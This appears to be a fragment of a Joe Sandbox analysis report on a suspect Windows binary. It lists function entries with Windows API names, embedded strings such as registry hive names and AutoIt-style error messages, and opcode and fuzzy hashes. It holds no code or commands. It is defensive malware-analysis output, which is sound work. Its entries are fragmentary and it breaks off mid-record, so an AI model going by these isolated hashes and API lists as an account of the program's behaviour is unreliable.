                                                                                                                    • Instruction ID: 4a861795aebfe9f3bb8c174a31d9d8e7f0032cb836dfe163346b4cd57b33a8b3
                                                                                                                    • Opcode Fuzzy Hash: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                                                                    • Instruction Fuzzy Hash: CD918A32A18B858AEB50DB69E4543ACB3A0FB99B84F904036DF4D47B68DF3CE055C760
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1111067124-438819550
                                                                                                                    • Opcode ID: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                                                                    • Instruction ID: 7f677bb22634d59f3a4c70942271c1bd018d7a9912338c4feca3b93f666d42de
                                                                                                                    • Opcode Fuzzy Hash: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                                                                    • Instruction Fuzzy Hash: DE717132618B8681DB10EF2DE8401EAA361FBAAB84F805032DF4E47779DF39E555C790
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2598888154-3916222277
                                                                                                                    • Opcode ID: 79184ce47625452b7c1eac5b0605ba5941df3dba146d8061b2bfb490f4dfffa8
                                                                                                                    • Instruction ID: 55eda5860a65f4148075befb459db420846a9e98936ae8f8bd72e4d3bf974ffc
                                                                                                                    • Opcode Fuzzy Hash: 79184ce47625452b7c1eac5b0605ba5941df3dba146d8061b2bfb490f4dfffa8
                                                                                                                    • Instruction Fuzzy Hash: 1A518436B14641CFEB40DF7AE444AADB7B1F749B88B409125EF4A53B28CF38E4258B50
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                    • API String ID: 2706829360-2785691316
                                                                                                                    • Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                                                                    • Instruction ID: 03c47bac585fb232f7fd1739474dcdd48f15cb26916b85485e203de6e695ada9
                                                                                                                    • Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                                                                    • Instruction Fuzzy Hash: 9F515E22A15A1289EB40EF6DD8846EDB370FB95B89F805031DF0E57679DF38E05AC390
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF7BB87FD7B), ref: 00007FF7BB881143
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                    • API String ID: 3964851224-909552448
                                                                                                                    • Opcode ID: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                                                                    • Instruction ID: 05bc568b986f1780d6b79a94cc5c0110d8146ab77e7fda3b7427263021a56e77
                                                                                                                    • Opcode Fuzzy Hash: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                                                                    • Instruction Fuzzy Hash: 9BE1A712F0855782EA61BB6D9C44278A391BF3AB94BC44531DF1D477ACEF3CE86583A0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                    • String ID: P
                                                                                                                    • API String ID: 1460738036-3110715001
                                                                                                                    • Opcode ID: 425b3d5a2051c68f0670dcdad59ee9d800cc35cf3d8f3cee648c2718cc05a541
                                                                                                                    • Instruction ID: e943f21b665615457286c0207b6e159e5167860b1bf63f4c25ba87e462079643
                                                                                                                    • Opcode Fuzzy Hash: 425b3d5a2051c68f0670dcdad59ee9d800cc35cf3d8f3cee648c2718cc05a541
                                                                                                                    • Instruction Fuzzy Hash: 0D710821A082428AEB50EF7CD4C46BDA791BB56748FD44432DF4E076A9CF3CE465C760
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadStringwprintf
                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 3297454147-3080491070
                                                                                                                    • Opcode ID: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                                                                    • Instruction ID: 71a51ede2c845e0da65fd1f0090da6f8811ed65d223927e8499be9ed73eb7633
                                                                                                                    • Opcode Fuzzy Hash: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                                                                    • Instruction Fuzzy Hash: 3A613921A18A4296EB00FB6CE4405E8A365FFAA744FC01032EF4D536BEDE7CE516C790
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                    • API String ID: 4051287042-2268648507
                                                                                                                    • Opcode ID: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                                                                    • Instruction ID: 2be986223f11d525f230a4530992b44e17230b89cf155c21793a4bcc8986909d
                                                                                                                    • Opcode Fuzzy Hash: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                                                                    • Instruction Fuzzy Hash: 0A515C21A18A4291EB00FB6CE8414ADA365FFAA744BC05032EF5D536BEDE7CE516C790
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                                                                                    • String ID: BUTTON
                                                                                                                    • API String ID: 3935177441-3405671355
                                                                                                                    • Opcode ID: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                                                                    • Instruction ID: 4f1234954e74b383de743ad25a9eb3ebe0a5d24a529abf7171a56bfbe6bc8a06
                                                                                                                    • Opcode Fuzzy Hash: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                                                                    • Instruction Fuzzy Hash: 6C312320A0970785FB10BF3CF894A75A252BFA6754FC45035DF0E0A6B8DE2CF46583A0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                                                                    • String ID:
                                                                                                                    Similarity
                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                    • String ID:
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                    • String ID:
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                                                    • String ID: %s%u
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                                                                                    • String ID: ThumbnailClass
                                                                                                                    Similarity
                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                    • String ID: P
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadStringwprintf
                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                                                                    • String ID: static
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                    • API String ID: 3827137101-3457252023
                                                                                                                    • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                                                    • Instruction ID: e2d12750d2ad0bdf4ddad85a2e134ec3227d25e6c9b573c2aad44947a4c02c7e
                                                                                                                    • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                                                    • Instruction Fuzzy Hash: E841822160868385E720AB2DE8046FDA3A0FF96798F841135DE4D47AACDF7CD655C760
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 541375521-0
                                                                                                                    • Opcode ID: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                                                                    • Instruction ID: 739312a07b9c64245cccca68787825b074b45b9e3e511d2ccf599b6559e4c221
                                                                                                                    • Opcode Fuzzy Hash: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                                                                    • Instruction Fuzzy Hash: AE419565D0C7C155FB71AB6C94847B9AA90FB27744F888039CF8A035E9CE1DB8A483B1
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                                                                                    • String ID: 5$Ping
                                                                                                                    • API String ID: 1486594354-1972892582
                                                                                                                    • Opcode ID: 50c9766b147798dbf883b68baece8b13dfb7140da160f784641b179a8359557b
                                                                                                                    • Instruction ID: 6eee132f34d3fcef68a57f381a57becfe8b7e1f985b628298782b01761fd4612
                                                                                                                    • Opcode Fuzzy Hash: 50c9766b147798dbf883b68baece8b13dfb7140da160f784641b179a8359557b
                                                                                                                    • Instruction Fuzzy Hash: 7C714C62A08A4182EA10AF6ED49437DA7A0FFA6B94F818432DF4D477B9CF7CD4508760
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                    • API String ID: 3215553584-2617248754
                                                                                                                    • Opcode ID: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                                                                    • Instruction ID: e2d24945e3b6be39c7f05973d2abb83904f49e20d3ef2a8fcc01a862e71cbccf
                                                                                                                    • Opcode Fuzzy Hash: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                                                                    • Instruction Fuzzy Hash: 1D419C32A06B4199EB50DB2CE8417ED77A5FB69388F804135EF9C07B68DE38D029C390
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadMessageModuleStringwprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                    • API String ID: 4007322891-4153970271
                                                                                                                    • Opcode ID: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                                                                    • Instruction ID: e8f1d7a364284b3d33d595d01fda6445f1e172621a33f72cff7adee54622482e
                                                                                                                    • Opcode Fuzzy Hash: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                                                                    • Instruction Fuzzy Hash: 9B316D32A18A8291DB10AB2CE4455ADA364FFA9B84FC05032EF4D036BDDF7CE515C790
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 2573188126-1403004172
                                                                                                                    • Opcode ID: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                                                                    • Instruction ID: e0bf3a987c44d7ea6b75277ec6bdaaa7c9ae167d5f4f5db128f7e6de3d23f18b
                                                                                                                    • Opcode Fuzzy Hash: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                                                                    • Instruction Fuzzy Hash: 6831A421A0874181EA10AB2DD8541F9A361FFAAFA4F844231DFAD077E9DE3CE515C7A0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                                                    • String ID: 0.0.0.0
                                                                                                                    • API String ID: 2479661705-3771769585
                                                                                                                    • Opcode ID: c022dea36b0d6b041929f70b141b9e152a2f360cd32598783c827dc949a89afb
                                                                                                                    • Instruction ID: bdb8b93167443a510eefcdfd102e23fd53e9aa91c8b7899a2f6747cfeebd80c9
                                                                                                                    • Opcode Fuzzy Hash: c022dea36b0d6b041929f70b141b9e152a2f360cd32598783c827dc949a89afb
                                                                                                                    • Instruction Fuzzy Hash: CB217421A0854241EE24BB2DE4943B9A361BFA67C0FC04131DF8D076BDDE6CE5A4C7A1
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2672075419-0
                                                                                                                    • Opcode ID: 5d448b6b5489ede48ca866054f3642e2458e9f5a6920a77f390562690e31932d
                                                                                                                    • Instruction ID: 77089a5884ee110ae9f0a2b4f8cd9b338ba630a5845ca427a99918744a587358
                                                                                                                    • Opcode Fuzzy Hash: 5d448b6b5489ede48ca866054f3642e2458e9f5a6920a77f390562690e31932d
                                                                                                                    • Instruction Fuzzy Hash: 08917336B0865289FB50AF7DD4447ADA3A1BB66B88F901035DF4D436ADCF39F42583A0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2156557900-0
                                                                                                                    • Opcode ID: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                                                                    • Instruction ID: 880890b530af6ca9e26ec3c26bd101bbd2afce46ff97fffd6f54b2e59eb8f34b
                                                                                                                    • Opcode Fuzzy Hash: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                                                                    • Instruction Fuzzy Hash: 82315334B0870286EB50BB2EA484639F2A1BB66750FD05439CE4A4767CDE3DFC6587A0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                    • API String ID: 0-1603158881
                                                                                                                    • Opcode ID: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                                                                    • Instruction ID: 425e74310340166dad9593da297424cf942486230b1c107aee1b6080a6c3a212
                                                                                                                    • Opcode Fuzzy Hash: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                                                                    • Instruction Fuzzy Hash: E312C562B1864356EA68AB3CC8112F9E290BF76784FC44535DF1D462B8EF7CE564C2B0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Init$Clear
                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                                                                    • API String ID: 3467423407-1765764032
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1903627254-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1957940570-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                    • API String ID: 3721556410-2107944366
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                    • String ID: 2$P
                                                                                                                    • API String ID: 93392585-1110268094
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoad_invalid_parameter_noinfo
                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                    • API String ID: 4060274358-404129466
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 50796853-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1268545403-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3864802216-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2550207440-0
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3225163088-0
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$Enabled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3694350264-0
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3401586794-0
                                                                                                                    Similarity
                                                                                                                    • API ID: LongMessageSendWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3360111000-0
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4170576061-0
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 395352322-0
                                                                                                                    • Opcode ID: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                                                                    • Instruction ID: e3eb50d0232ed8d7014c849fa12698548c1f082076f8388f1669028346e5463f
                                                                                                                    • Opcode Fuzzy Hash: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                                                                    • Instruction Fuzzy Hash: 0C419432618B8586E721EF19E4583EAA3A0FB9A744F840135EF8D06A6CCF3DD159C790
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3761583154-0
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocByteCharMultiStringWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3603722519-0
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3220332590-0
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: f$p
                                                                                                                    • API String ID: 3215553584-1290815066
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3859894641-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 564229958-0
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                    • API String ID: 0-2263619337
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2592858361-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 383626216-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2082702847-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 43455801-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4278518827-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 839392675-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 179993514-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 146765662-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                    • API String ID: 1653399731-2785691316
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF7BB87BF47), ref: 00007FF7BB87CE29
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharLower
                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                    • API String ID: 2358735015-567219261
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
